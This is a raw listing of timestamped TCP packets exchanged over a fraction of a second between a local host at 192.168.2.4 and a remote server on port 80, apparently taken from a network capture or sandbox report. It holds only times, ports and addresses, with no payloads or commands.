Sep 14, 2024 18:31:09.425884962 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.425894022 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.425956964 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.425987005 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.425997972 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.426007986 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.426018000 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.426022053 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.426039934 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.426043034 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.426050901 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.426069975 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.426096916 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.426175117 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.426186085 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.426194906 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.426204920 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.426218033 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.426227093 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.426230907 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.426256895 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.426275015 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.426362038 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.426373005 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.426382065 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.426433086 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.426465034 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.426475048 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.426485062 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.426495075 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.426506996 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.426522970 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.426548004 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.426666021 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.426683903 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.426693916 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.426772118 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.426831961 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.426841974 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.426868916 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.426878929 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.426887989 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.426928997 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.426939964 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.426947117 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.426949024 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.426959991 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.426968098 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.426995039 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.427037001 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.427114964 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.427126884 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.427138090 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.427150965 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.427170038 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.427196026 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.427202940 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.427206993 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.427217007 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.427227974 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.427237988 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.427249908 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.427258015 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.427280903 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.427298069 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.427879095 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.427905083 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.427913904 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.427987099 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.427997112 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.428008080 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.428020954 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.428025007 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.428033113 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.428060055 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.428083897 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.428095102 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.428105116 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.428113937 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.428123951 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.428129911 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.428205013 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.428209066 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.428209066 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.428216934 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.428229094 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.428294897 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.428294897 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.466586113 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.466600895 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.466619015 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.466629028 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.466639996 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.466650963 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.466660976 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.466671944 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.466974974 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.466974974 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.510274887 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.510288954 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.510298014 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.510301113 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.510305882 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.510313988 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.510323048 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.510332108 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.510586977 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.510740042 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.510747910 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.510890007 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.510900021 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.510907888 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.510917902 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.510925055 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.511040926 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.511042118 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.511042118 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.511066914 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.511218071 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.511943102 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.511951923 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.511960983 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.511969090 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.511979103 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.511987925 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.511997938 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.512012005 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.512044907 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.512126923 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.512135983 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.512146950 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.512151957 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.512156963 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.512207031 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.512283087 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.512294054 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.512301922 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.512311935 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.512363911 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.512453079 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.512461901 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.512470961 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.512480021 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.512484074 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.512492895 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.512502909 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.512538910 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.512576103 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.512634039 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.512645006 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.512653112 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.512660980 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.512686968 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.512717962 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.512784958 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.512794971 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.512803078 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.512808084 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.512835026 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.512865067 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.512917995 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.512928009 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.512943983 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.512953997 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.512969017 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.512974024 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.512989044 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.512999058 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.513005972 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.513009071 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.513015985 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.513025045 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.513034105 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.513040066 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.513041973 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.513060093 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.513071060 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.513076067 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.513082027 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.513092041 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.513094902 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.513102055 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.513112068 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.513120890 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.513123035 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.513129950 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.513142109 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.513144016 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.513150930 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.513161898 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.513168097 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.513190985 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.513214111 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.513288975 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.513329983 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.513339996 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.513394117 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.513415098 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.513423920 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.513432980 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.513441086 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.513448954 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.513473034 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.513508081 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.513508081 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.513520956 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.513531923 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.513540983 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.513577938 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.513617039 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.513628006 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.513638020 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.513648987 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.513669014 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.513669968 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.513700962 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.513730049 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.513742924 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.513796091 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.513806105 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.513843060 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.513860941 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.513873100 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.513881922 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.513892889 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.513917923 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.513947964 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.513978004 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.513988972 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.513998985 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.514008999 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.514030933 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.514062881 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.514064074 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.514076948 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.514087915 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.514096022 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.514117956 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.514147997 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.514879942 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.514890909 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.514900923 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.514916897 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.514926910 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.514938116 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.514947891 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.514967918 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.515072107 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.515074015 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.515084028 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.515094995 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.515106916 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.515153885 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.515171051 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.515182018 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.515192032 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.515202999 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.515253067 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.554419994 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.554433107 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.554442883 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.554446936 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.554450989 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.554455996 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.554461002 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.554729939 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.596770048 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.596787930 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.596797943 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.596803904 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.596808910 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.596812963 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.596818924 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.596904039 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.597155094 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.597310066 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.597317934 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.597326994 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.597374916 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.597383976 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.597393990 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.597408056 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.597428083 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.597460985 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.597460985 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.597460985 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.598597050 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.598606110 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.598613977 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.598671913 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.598678112 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.598683119 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.598692894 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.598704100 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.598722935 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.598777056 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.598810911 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.598984003 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.599040031 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.599055052 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.599066019 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.599092007 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.599101067 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.599123001 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.599154949 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.599164009 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.599174023 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.599229097 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.599272966 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.599283934 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.599292994 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.599302053 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.599311113 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.599318981 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.599327087 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.599337101 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.599371910 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.599400043 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.599467993 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.599498987 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.599509001 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.599519014 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.599534988 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.599546909 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.599556923 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.599566936 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.599576950 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.599646091 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.599647045 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.599663019 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.599673986 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.599677086 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.599684000 CEST	80	49738	172.67.203.195	192.168.2.4
